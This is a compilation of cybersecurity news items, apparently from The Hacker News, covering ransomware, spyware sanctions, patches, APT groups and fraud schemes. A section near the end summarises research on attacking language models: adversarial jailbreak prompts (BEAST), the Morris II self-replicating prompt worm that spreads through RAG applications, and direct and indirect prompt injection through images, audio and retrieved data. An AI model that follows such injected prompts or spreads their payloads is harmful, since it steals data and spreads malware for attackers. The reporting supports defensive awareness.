"With the discovery of new Linux variants of ransomware families, such as Abyss Locker, there is a worrying trend of ransomware on Linux and ESXi systems," it said. "Cloud and Linux infrastructure is now subject to a broader variety of attacks."
Exit Scam: BlackCat Ransomware Group Vanishes After $22 Million Payout
7.3.24
Ransom
The Hacker News
The threat actors behind the BlackCat ransomware have
shut down their darknet website and likely pulled an exit scam after uploading a
bogus law enforcement seizure banner.
"ALPHV/BlackCat did not get seized. They are exit scamming their affiliates," security researcher Fabian Wosar said. "It is blatantly obvious when you check the source code of the new takedown notice."
"There is absolutely zero reason why law enforcement would just put a saved version of the takedown notice up during a seizure instead of the original takedown notice."
The U.K.'s National Crime Agency (NCA) told Reuters that it had no connection to any disruptions to the BlackCat infrastructure.
Recorded Future security researcher Dmitry Smilyanets posted screenshots on the social media platform X in which the BlackCat actors claimed that the "feds screwed us over" and that they intended to sell the ransomware's source code for $5 million.
The disappearing act comes after it allegedly received a $22 million ransom payment from UnitedHealth's Change Healthcare unit (Optum) and refused to share the proceeds with an affiliate that had carried out the attack.
The company has not commented on the alleged ransom payment, instead stating it's only focused on investigation and recovery aspects of the incident.
According to DataBreaches, the disgruntled affiliate – who had their account suspended by the administrative staff – made the allegations on the RAMP cybercrime forum. "They emptied the wallet and took all the money," they said.
This has raised speculations that BlackCat has staged an exit scam to evade scrutiny and resurface in the future under a new brand. "A re-branding is pending," a now-former admin of the ransomware group was quoted as saying.
Menlo Security, citing HUMINT sources with direct contact to the affiliate, described them as likely associated with Chinese nation-state groups. The affiliate, who goes by the name Notchy, is said to have engaged on ransomware-related topics in the RAMP forum as early as 2021.
BlackCat had its infrastructure seized by law enforcement in December 2023, but
the e-crime gang managed to wrest control of their servers and restart its
operations without any major consequences. The group previously operated under
the monikers DarkSide and BlackMatter.
"Internally, BlackCat may be worried about moles within their group, and closing up shop preemptively could stop a takedown before it occurs," Malachi Walker, a security advisor with DomainTools, said.
"On the other hand, this exit scam might simply be an opportunity for BlackCat to take the cash and run. Since crypto is once again at an all-time high, the gang can get away with selling their product 'high.' In the cybercrime world, reputation is everything, and BlackCat seems to be burning bridges with its affiliates with these actions."
The group's apparent demise and the abandonment of its infrastructure come as malware research group VX-Underground reported that the LockBit ransomware operation no longer supports Lockbit Red (aka Lockbit 2.0) and StealBit, a custom tool used by the threat actor for data exfiltration.
LockBit has also tried to save face by moving some of its activities to a new dark web portal after a coordinated law enforcement operation took down its infrastructure last month following a months-long investigation.
It also comes as Trend Micro revealed that the ransomware family known as RA World (formerly RA Group) has successfully infiltrated healthcare, finance, and insurance companies in the U.S., Germany, India, Taiwan, and other countries since emerging in April 2023.
Attacks mounted by the group "involve multi-stage components designed to ensure maximum impact and success in the group's operations," the cybersecurity firm noted.
U.S. Cracks Down on Predatory Spyware Firm for Targeting Officials and
Journalists
6.3.24
Virus
The Hacker News
The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) sanctioned two individuals and five entities associated with the Intellexa Alliance for their role in "developing, operating, and distributing" commercial spyware designed to target government officials, journalists, and policy experts in the country.
"The proliferation of commercial spyware poses distinct and growing security risks to the United States and has been misused by foreign actors to enable human rights abuses and the targeting of dissidents around the world for repression and reprisal," the agency said.
"The Intellexa Consortium, which has a global customer base, has enabled the proliferation of commercial spyware and surveillance technologies around the world, including to authoritarian regimes."
The Intellexa Alliance is a consortium of several companies, including Cytrox, linked to a mercenary spyware solution called Predator. In July 2023, the U.S. government added Cytrox and Intellexa, as well as their corporate holdings in Hungary, Greece, and Ireland, to the Entity List.
Predator, much like NSO Group's Pegasus, can infiltrate Android and iOS devices using zero-click attacks that require no user interaction. Once installed, the spyware makes it possible for the operators to harvest sensitive data and surveil targets of interest.
OFAC said unspecified foreign actors had deployed Predator against U.S. government officials, journalists, and policy experts.
"In the event of a successful Predator infection, the spyware's operators can access and retrieve sensitive information including contacts, call logs, and messaging information, microphone recordings, and media from the device," the Treasury Department said.
The sanctions designations apply to the following individuals and entities -
Tal Jonathan Dilian (Dilian), the founder of the Intellexa Consortium
Sara
Aleksandra Fayssal Hamou (Hamou), a corporate off-shoring specialist who has
provided managerial services to the Intellexa Consortium
Intellexa S.A., a
Greece-based software development company
Intellexa Limited, an Ireland-based
company
Cytrox AD, a North Macedonia-based company that's responsible for the
development of Predator
Cytrox Holdings Zartkoruen Mukodo Reszvenytarsasag
(Cytrox Holdings ZRT), a Hungary-based entity
Thalestris Limited, an
Ireland-based entity that holds distribution rights to the Predator spyware
It's worth noting that Intellexa S.A., Intellexa Limited, Cytrox AD, and Cytrox
Holdings ZRT were added to the aforementioned economic blocklist last year.
The development comes as new revelations about Predator's multi-tiered delivery infrastructure from Recorded Future, and Sekoia prompted the operators to shut down their servers.
The sanctions targeting the makers of Predator also arrived after the U.S. government unveiled a new policy last month that will allow it to impose visa restrictions on foreign individuals involved in the misuse of commercial spyware.
Citizen Lab security researcher John Scott-Railton described the OFAC designations as a huge deal, stating they mark the "first time they're used against a mercenary spyware company."
"The United States remains focused on establishing clear guardrails for the responsible development and use of these technologies while also ensuring the protection of human rights and civil liberties of individuals around the world," said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson.
VMware Issues Security Patches for ESXi, Workstation, and Fusion Flaws
6.3.24
Vulnerebility
The Hacker News
VMware has released patches to address four security flaws impacting ESXi, Workstation, and Fusion, including two critical flaws that could lead to code execution.
Tracked as CVE-2024-22252 and CVE-2024-22253, the vulnerabilities have been described as use-after-free bugs in the XHCI USB controller. They carry a CVSS score of 9.3 for Workstation and Fusion, and 8.4 for ESXi systems.
"A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host," the company said in a new advisory.
"On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed."
Multiple security researchers associated with the Ant Group Light-Year Security Lab and QiAnXin have been credited with independently discovering and reporting CVE-2024-22252. Security researchers VictorV and Wei have been acknowledged for reporting CVE-2024-22253.
Also patched by the Broadcom-owned virtualization services provider are two other shortcomings -
CVE-2024-22254 (CVSS score: 7.9) - An out-of-bounds write vulnerability in ESXi
that a malicious actor with privileges within the VMX process could exploit to
trigger a sandbox escape.
CVE-2024-22255 (CVSS score: 7.9) - An information
disclosure vulnerability in the UHCI USB controller that an attacker with
administrative access to a virtual machine may exploit to leak memory from the
vmx process.
The issues have been addressed in the following versions,
including those that have reached end-of-life (EoL) due to the severity of these
issues -
ESXi 6.5 - 6.5U3v
ESXi 6.7 - 6.7U3u
ESXi 7.0 - ESXi70U3p-23307199
ESXi
8.0 - ESXi80U2sb-23305545 and ESXi80U1d-23299997
VMware Cloud Foundation
(VCF) 3.x
Workstation 17.x - 17.5.1
Fusion 13.x (macOS) - 13.5.1
As a
temporary workaround until a patch can be deployed, customers have been asked to
remove all USB controllers from the virtual machine.
"In addition, virtual/emulated USB devices, such as VMware virtual USB stick or dongle, will not be available for use by the virtual machine," the company said. "In contrast, the default keyboard/mouse as input devices are not affected as they are, by default, not connected through USB protocol but have a driver that does software device emulation in the guest OS."
Alert: GhostSec and Stormous Launch Joint Ransomware Attacks in Over 15
Countries
6.3.24
Ransom
The Hacker News
The cybercrime group called GhostSec has been linked to a Golang variant of a ransomware family called GhostLocker.
"TheGhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries," Cisco Talos researcher Chetan Raghuprasad said in a report shared with The Hacker News.
"GhostLocker and Stormous ransomware have started a new ransomware-as-a-service (RaaS) program STMX_GhostLocker, providing various options for their affiliates."
Attacks mounted by the group have targeted victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia.
Some of the most impacted business verticals include technology, education, manufacturing, government, transportation, energy, medicolegal, real estate, and telecom.
GhostSec – not to be confused with Ghost Security Group (which is also called GhostSec) – is part of a coalition called The Five Families, which also includes ThreatSec, Stormous, Blackforums, and SiegedSec.
It was formed in August 2023 to "establish better unity and connections for everyone in the underground world of the internet, to expand and grow our work and operations."
Late last year, the cybercrime group ventured into ransomware-as-a-service (RaaS) with GhostLocker, offering it to other actors for $269.99 per month. Soon after, the Stormous ransomware group announced that it will use Python-based ransomware in its attacks.
The latest findings from Talos show that the two groups have banded together to not only strike a wide range of sectors, but also unleash an updated version of GhostLocker in November 2023 as well as start a new RaaS program in 2024 called STMX_GhostLocker.
"The new program is made up of three categories of services for the affiliates: paid, free, and another for the individuals without a program who only want to sell or publish data on their blog (PYV service)," Raghuprasad explained.
STMX_GhostLocker, which comes with its own leak site on the dark web, lists no less than six victims from India, Uzbekistan, Indonesia, Poland, Thailand, and Argentina.
GhostLocker 2.0 (aka GhostLocker V2) is written in Go and has been advertised as fully effective and offering speedy encryption/decryption capabilities. It also comes with a revamped ransom note that urges victims to get in touch with them within seven days or risk getting their stolen data leaked.
The RaaS scheme also allows affiliates to track their operations, monitor encryption status, and payments through a web panel. They are also provided with a builder that makes it possible to configure the locker payload according to their preferences, including the directories to encrypt and the processes and services to be terminated before commencing the encryption process.
Once deployed, the ransomware establishes connection with a command-and-control (C2) panel and proceeds with encryption routine, but not before killing the defined processes or services and exfiltrating files matching a specific list of extensions.
Talos said it discovered two new tools likely used by GhostSec to compromise legitimate sites. "One of them is the 'GhostSec Deep Scan toolset' to scan legitimate websites recursively, and another is a hack tool to perform cross-site scripting (XSS) attacks called "GhostPresser,'" Raghuprasad said.
GhostPresser is mainly designed to break into WordPress sites, allowing the threat actors to alter site settings, add new plugins and users, and even install new themes, demonstrating GhostSec's commitment to evolving its arsenal.
"The group themselves has claimed they've used it in attacks on victims, but we don't have any way to validate any of those claims. This tooling would likely be used by the ransomware operators for a variety of reasons," Talos told The Hacker News.
"The deep scan tool could be leveraged to look for ways into victim networks and the GhostPresser tool, in addition to compromising victim websites, could be used to stage payloads for distribution, if they didn't want to use actor infrastructure."
New APT Group 'Lotus Bane' Behind Recent Attacks on Vietnam's Financial Entities
6.3.24
APT
The Hacker News
A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023.
Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that's believed to have been active since at least 2022.
The exact specifics of the infection chain remain unknown as yet, but it involves the use of various malicious artifacts that serve as the stepping stone for the next-stage.
"The cybercriminals used methods such as DLL side-loading and data exchange via named pipes to run malicious executables and create remote scheduled tasks for lateral movement," the company said.
Group-IB told The Hacker News that the techniques used by Lotus Bane overlap with that of OceanLotus, a Vietnam-aligned threat actor also known as APT32, Canvas Cyclone (formerly Bismuth), and Cobalt Kitty. This stems from the use of malware like PIPEDANCE for named pipes communication.
It's worth noting that PIPEDANCE was first documented by Elastic Security Labs in February 2023 in connection with a cyber attack targeting an unnamed Vietnamese organization in late December 2022.
"This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different," Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.
"Lotus Bane is actively engaging in attacks primarily targeting the banking sector in the APAC region. Although the known attack was in Vietnam, the sophistication of their methods indicates the potential for broader geographical operations within APAC. The exact duration of their activity prior to this discovery is currently unclear, but ongoing investigations may shed more light on their history."
The development comes as financial organizations across Asia-Pacific (APAC), Europe, Latin America (LATAM), and North America have been the target of several advanced persistent threat groups such as Blind Eagle and the Lazarus Group over the past year.
Another notable financially motivated threat group is UNC1945, which has been observed targeting ATM switch servers with the goal of infecting them with a custom malware called CAKETAP.
"This malware intercepts data transmitted from the ATM server to the [Hardware Security Module] server and checks it against a set of predefined conditions," Group-IB said. "If these conditions are met, the data is altered before being sent out from the ATM server."
UNC2891 and UNC1945 were previously detailed by Google-owned Mandiant in March 2022 as having deployed the CAKETAP rootkit on Oracle Solaris systems to intercept messages from an ATM switching network and perform unauthorized cash withdrawals at different banks using fraudulent cards.
"The presence and activities of both Lotus Bane and UNC1945 in the APAC region highlight the need for continued vigilance and robust cybersecurity measures," Tikhonova said. "These groups, with their distinct tactics and targets, underline the complexity of protecting against financial cyber threats in today's digital landscape."
Urgent: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws
6.3.24
OS
The Hacker News
Apple has released security updates to address several
security flaws, including two vulnerabilities that it said have been actively
exploited in the wild.
The shortcomings are listed below -
CVE-2024-23225 - A memory corruption issue in Kernel that an attacker with
arbitrary kernel read and write capability can exploit to bypass kernel memory
protections
CVE-2024-23296 - A memory corruption issue in the RTKit real-time
operating system (RTOS) that an attacker with arbitrary kernel read and write
capability can exploit to bypass kernel memory protections
It's currently not
clear how the flaws are being weaponized in the wild. Apple said both the
vulnerabilities were addressed with improved validation in iOS 17.4, iPadOS
17.4, iOS 16.7.6, and iPadOS 16.7.6.
The updates are available for the following devices -
iOS 16.7.6 and iPadOS 16.7.6 - iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th
generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
iOS 17.4
and iPadOS 17.4 - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and
later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air
3rd generation and later, iPad 6th generation and later, and iPad mini 5th
generation and later
With the latest development, Apple has addressed a total
of three actively exploited zero-days in its software since the start of the
year. In late January 2024, it plugged a type confusion flaw in WebKit
(CVE-2024-23222) impacting iOS, iPadOS, macOS, tvOS, and Safari web browser that
could result in arbitrary code execution.
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two flaws to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply necessary updates by March 26, 2024.
The vulnerabilities concern an information disclosure flaw affecting Android Pixel devices (CVE-2023-21237) and an operating system command injection flaw in Sunhillo SureLine that could result in code execution with root privileges (CVE-2021-36380).
Google, in an advisory published in June 2023, acknowledged it found indications that "CVE-2023-21237 may be under limited, targeted exploitation." As for CVE-2021-36380, Fortinet revealed late last year that a Mirai botnet called IZ1H9 was leveraging the flaw to corral susceptible devices into a DDoS botnet.
Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware
6.3.24
Virus
The Hacker News
North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.
According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.
"The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application," security researchers Keith Wojcieszek, George Glass, and Dave Truman said.
"They then leveraged their now 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware."
The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.
Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.
BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.
Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.
The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.
TODDLERSHARK "exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generate C2 URLs, which could make this malware hard to detect in some environments," the researchers said.
The development comes as South Korea's National Intelligence Service (NIS) accused its northern counterpart of allegedly compromising the servers of two domestic (and unnamed) semiconductor manufacturers and pilfering valuable data.
The digital intrusions took place in December 2023 and February 2024. The threat actors are said to have targeted internet-exposed and vulnerable servers to gain initial access, subsequently leveraging living-off-the-land (LotL) techniques rather than dropping malware in order to better evade detection.
"North Korea may have begun preparations for its own production of semiconductors due to difficulties in procuring semiconductors due to sanctions against North Korea and increased demand due to the development of weapons such as satellite missiles," NIS said.
Cybercriminals Using Novel DNS Hijacking Technique for Investment Scams
5.3.24
Cyber
The Hacker News
A new DNS threat actor dubbed Savvy Seahorse is leveraging sophisticated techniques to entice targets into fake investment platforms and steal funds.
"Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia," Infoblox said in a report published last week.
Targets of the campaigns include Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers, indicating that the threat actors are casting a wide net in their attacks.
Users are lured via ads on social media platforms like Facebook, while also tricking them into parting with their personal information in return for alleged high-return investment opportunities through fake ChatGPT and WhatsApp bots.
The financial scam campaigns are notable for using DNS canonical name (CNAME) records to create a traffic distribution system (TDS), thereby allowing threat actors to evade detection since at least August 2021.
A CNAME record is used to map a domain or subdomain to another domain (i.e., an alias) instead of pointing to an IP address. One advantage with this approach is that when the IP address of the host changes, only the DNS A record for the root domain needs to be updated.
Savvy Seahorse leverages this technique to its advantage by registering several
short-lived subdomains that share a CNAME record (and thus an IP address). These
specific subdomains are created using a domain generation algorithm (DGA) and
are associated with the primary campaign domain.
The ever-changing nature of the domains and IP addresses also makes the
infrastructure resistant to takedown efforts, allowing the threat actors to
continuously create new domains or alter their CNAME records to a different IP
address as their phishing sites are disrupted.
While threat actors like VexTrio have used DNS as a TDS, the discovery marks the
first time CNAME records have been used for such purposes.
Victims who end up clicking the links embedded on Facebook ads are urged to
provide their names, email addresses, and phone numbers, after which they are
redirected to the bogus trading platform for adding funds to their wallets.
"An important detail to note is the actor validates the user's information to
exclude traffic from a predefined list of countries, including Ukraine, India,
Fiji, Tonga, Zambia, Afghanistan, and Moldova, although their reasoning for
choosing these specific countries is unclear," Infoblox noted.
The development comes as Guardio Labs revealed that thousands of domains
belonging to legitimate brands and institutions have been hijacked using a
technique called CNAME takeover to propagate spam campaigns.
Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets
5.3.24
AI
The Hacker News
More than 225,000 logs containing compromised OpenAI
ChatGPT credentials were made available for sale on underground markets between
January and October 2023, new findings from Group-IB show.
These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware.
"The number of infected devices decreased slightly in mid- and late summer but grew significantly between August and September," the Singapore-headquartered cybersecurity company said in its Hi-Tech Crime Trends 2023/2024 report published last week.
Between June and October 2023, more than 130,000 unique hosts with access to OpenAI ChatGPT were infiltrated, a 36% increase over what was observed during the first five months of 2023. The breakdown by the top three stealer families is below -
LummaC2 - 70,484 hosts
Raccoon - 22,468 hosts
RedLine - 15,970 hosts
"The sharp increase in the number of ChatGPT credentials for sale is due to the
overall rise in the number of hosts infected with information stealers, data
from which is then put up for sale on markets or in UCLs," Group-IB said.
The development comes as Microsoft and OpenAI revealed that nation-state actors from Russia, North Korea, Iran, and China are experimenting with artificial intelligence (AI) and large language models (LLMs) to complement their ongoing cyber attack operations.
Stating that LLMs can be used by adversaries to brainstorm new tradecraft, craft
convincing scam and phishing attacks, and improve operational productivity,
Group-IB said the technology could also speed up reconnaissance, execute hacking
toolkits, and make scammer robocalls.
"In the past, [threat actors] were mainly interested in corporate computers and in systems with access that enabled movement across the network," it noted. "Now, they also focus on devices with access to public AI systems.
"This gives them access to logs with the communication history between employees and systems, which they can use to search for confidential information (for espionage purposes), details about internal infrastructure, authentication data (for conducting even more damaging attacks), and information about application source code."
Abuse of valid account credentials by threat actors has emerged as a top access technique, primarily fueled by the easy availability of such information via stealer malware.
"The combination of a rise in infostealers and the abuse of valid account credentials to gain initial access has exacerbated defenders' identity and access management challenges," IBM X-Force said.
"Enterprise credential data can be stolen from compromised devices through credential reuse, browser credential stores or accessing enterprise accounts directly from personal devices."
Warning: Thread Hijacking Attack Targets IT Networks, Stealing NTLM Hashes
5.3.24
Hacking
The Hacker News
The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.
The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.
At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.
The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.
The ZIP attachments come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.
"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said, which could then be used for pass-the-hash (PtH) type attacks.
This means that adversaries who are in possession of a password hash do not need
the underlying password to authenticate a session, ultimately enabling them to
move through a network and gain unauthorized access to valuable data.
TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.
"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.
It also described the threat actor as acutely aware of the shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are highly recommended to block outbound SMB to prevent exploitation.
Critical JetBrains TeamCity On-Premises Flaws Could Lead to Server Takeovers
5.3.24
Exploit
The Hacker News
A new pair of security vulnerabilities have been
disclosed in JetBrains TeamCity On-Premises software that could be exploited by
a threat actor to take control of affected systems.
The flaws, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3), have been addressed in version 2023.11.4. They impact all TeamCity On-Premises versions through 2023.11.3.
"The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server," JetBrains said in an advisory released Monday.
TeamCity Cloud instances have already been patched against the two flaws. Cybersecurity firm Rapid7, which discovered and reported the issues on February 20, 2024, said CVE-2024-27198 is a case of authentication bypass that allows for a complete compromise of a susceptible server by a remote unauthenticated attacker.
"Compromising a TeamCity server allows an attacker full control over all TeamCity projects, builds, agents and artifacts, and as such is a suitable vector to position an attacker to perform a supply chain attack," the company noted.
CVE-2024-27199, also an authentication bypass flaw, stems from a path traversal issue that can permit an unauthenticated attacker to replace the HTTPS certificate in a vulnerable TeamCity server with a certificate of their choosing via the "/app/https/settings/uploadCertificate" endpoint and even alter the port number the HTTPS service listens on.
A threat actor could leverage the vulnerability to perform a denial-of-service against the TeamCity server by either changing the HTTPS port number, or by uploading a certificate that will fail client-side validation. Alternatively, the uploaded certificate could be used for adversary-in-the-middle scenarios if it's trusted by the clients.
"This authentication bypass allows for a limited number of authenticated endpoints to be reached without authentication," Rapid7 said of the shortcoming.
"An unauthenticated attacker can leverage this vulnerability to both modify a limited number of system settings on the server, as well as disclose a limited amount of sensitive information from the server."
The development comes nearly a month after JetBrains released fixes to contain another flaw (CVE-2024-23917, CVSS score: 9.8) that could also enable an unauthenticated attacker to gain administrative control of TeamCity servers.
With security vulnerabilities in JetBrains TeamCity having come under active exploitation last year by North Korean and Russian threat actors, it's essential that users take steps to update their servers immediately.
How Cybercriminals are Exploiting India's UPI for Money Laundering Operations
4.3.24
Exploit
The Hacker News
Cybercriminals are using a network of hired money mules
in India using an Android-based application to orchestrate a massive money
laundering scheme.
The malicious application, called XHelper, is a "key tool for onboarding and managing these money mules," CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report.
Details about the scam first emerged in late October 2023, when Chinese cyber criminals were found to take advantage of the fact that Indian Unified Payments Interface (UPI) service providers operate without coverage under the Prevention of Money Laundering Act (PMLA) to initiate illegal transactions under the guise of offering an instant loan.
The ill-gotten proceeds from the operation are transferred to other accounts belonging to hired mules, who are recruited from Telegram in return for commissions ranging from 1-2% of the total transaction amounts.
"Central to this operation are Chinese payment gateways exploiting the QR code feature of UPI with precision," the cybersecurity company noted at the time.
"The scheme leveraged a network exceeding hundreds of thousands of compromised 'money mule' accounts to funnel illicit funds through fraudulent payment channels, ultimately transferring them back to China."
These mules are efficiently managed using XHelper, which also facilitates the technology behind fake payment gateways used in pig butchering and other scams. The app is distributed via websites masquerading as legitimate businesses under the guise of "Money Transfer Business."
The app further offers the capability for mules to track their earnings and streamline the whole process of payouts and collection. This involves an initial setup process where they are asked to register their unique UPI IDs in a particular format and configure online banking credentials.
While payouts mandate the swift transfer of funds to pre-designated accounts
within 10 minutes, collection orders are more passive in nature, with the
registered accounts receiving incoming funds from other scammers utilizing the
platform.
"Money mules activate order intake within the XHelper app, enabling them to receive and fulfill money laundering tasks," the researchers said. "The system automatically assigns orders, potentially based on predetermined criteria or mule profiles."
Once an illicit fund transfer is executed using the linked bank account, mules are also expected to upload proof of the transaction in the form of screenshots, which are then validated in exchange for financial rewards, thereby incentivizing continued participation.
XHelper's features also extend to inviting others to join as agents, who are in
charge of recruiting the mules. It manifests as a referral system that allows
them to get bonuses for each new recruit, thus driving an ever-expanding network
of agents and mules.
"This referral system follows a pyramid-like structure, fueling mass recruitment of both agents and money mules, amplifying the reach of illicit activities," the researchers said. "Agents, in turn, recruit more mules and invite additional agents, perpetuating the growth of this interconnected network."
Another of XHelper's notable functions is to help train mules to efficiently launder stolen funds using a Learning Management System (LMS) that offers tutorials on opening fake corporate bank accounts (which have higher transaction limits), the different workflows, and ways to earn more commission.
Besides favoring the UPI feature built into legitimate banking apps for conducting the transfers, the platform acts as a hub for finding ways to get around account freezes to enable mules to continue their illegal activities. They are also given training to handle customer support calls made by banks for verifying suspicious transactions.
"While XHelper serves as a concerning example, it's crucial to recognize this isn't an isolated incident," CloudSEK said, adding it discovered a "growing ecosystem of similar applications facilitating money laundering across various scams."
In December 2023, Europol announced that 1,013 individuals were arrested in the second half of 2023 as part of a global effort to tackle money laundering. The international law enforcement operation also led to the identification of 10,759 money mules and 474 recruiters (aka herders).
The disclosure comes as Kaspersky revealed that malware, adware, and riskware attacks on mobile devices rose steadily from February 2023 until the end of the year.
"Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early 2021 levels by the end of the year," the Russian security vendor noted. "Adware accounted for the majority of threats detected in 2023."
Over 100 Malicious AI/ML Models Found on Hugging Face Platform
4.3.24
AI
The Hacker News
As many as 100 malicious artificial intelligence (AI)/machine learning (ML) models have been discovered in the Hugging Face platform.
These include instances where loading a pickle file leads to code execution, software supply chain security firm JFrog said.
"The model's payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims' machines through what is commonly referred to as a 'backdoor,'" senior security researcher David Cohen said.
"This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state."
Specifically, the rogue model initiates a reverse shell connection to 210.117.212[.]93, an IP address that belongs to the Korea Research Environment Open Network (KREONET). Other repositories bearing the same payload have been observed connecting to other IP addresses.
In one case, the authors of the model urged users not to download it, raising the possibility that the publication may be the work of researchers or AI practitioners.
"However, a fundamental principle in security research is refraining from publishing real working exploits or malicious code," JFrog said. "This principle was breached when the malicious code attempted to connect back to a genuine IP address."
The findings once again underscore the threat lurking within open-source
repositories, which could be poisoned for nefarious activities.
From Supply Chain Risks to Zero-click Worms#
They also come as researchers
have devised efficient ways to generate prompts that can be used to elicit
harmful responses from large-language models (LLMs) using a technique called
beam search-based adversarial attack (BEAST).
In a related development, security researchers have developed what's known as a generative AI worm called Morris II that's capable of stealing data and spreading malware through multiple systems.
Morris II, a twist on one of the oldest computer worms, leverages adversarial self-replicating prompts encoded into inputs such as images and text that, when processed by GenAI models, can trigger them to "replicate the input as output (replication) and engage in malicious activities (payload)," security researchers Stav Cohen, Ron Bitton, and Ben Nassi said.
Even more troublingly, the models can be weaponized to deliver malicious inputs to new applications by exploiting the connectivity within the generative AI ecosystem.
The attack technique, dubbed ComPromptMized, shares similarities with
traditional approaches like buffer overflows and SQL injections owing to the
fact that it embeds the code inside a query and data into regions known to hold
executable code.
ComPromptMized impacts applications whose execution flow is reliant on the output of a generative AI service as well as those that use retrieval augmented generation (RAG), which combines text generation models with an information retrieval component to enrich query responses.
The study is not the first, nor will it be the last, to explore the idea of prompt injection as a way to attack LLMs and trick them into performing unintended actions.
Previously, academics have demonstrated attacks that use images and audio recordings to inject invisible "adversarial perturbations" into multi-modal LLMs that cause the model to output attacker-chosen text or instructions.
"The attacker may lure the victim to a webpage with an interesting image or send an email with an audio clip," Nassi, along with Eugene Bagdasaryan, Tsung-Yin Hsieh, and Vitaly Shmatikov, said in a paper published late last year.
"When the victim directly inputs the image or the clip into an isolated LLM and asks questions about it, the model will be steered by attacker-injected prompts."
Early last year, a group of researchers at Germany's CISPA Helmholtz Center for Information Security at Saarland University and Sequire Technology also uncovered how an attacker could exploit LLM models by strategically injecting hidden prompts into data (i.e., indirect prompt injection) that the model would likely retrieve when responding to user input.
Phobos Ransomware Aggressively Targeting U.S. Critical Infrastructure
4.3.24
Ransom
The Hacker News
U.S. cybersecurity and intelligence agencies have warned
of Phobos ransomware attacks targeting government and critical infrastructure
entities, outlining the various tactics and techniques the threat actors have
adopted to deploy the file-encrypting malware.
"Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S. dollars," the government said.
The advisory comes from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
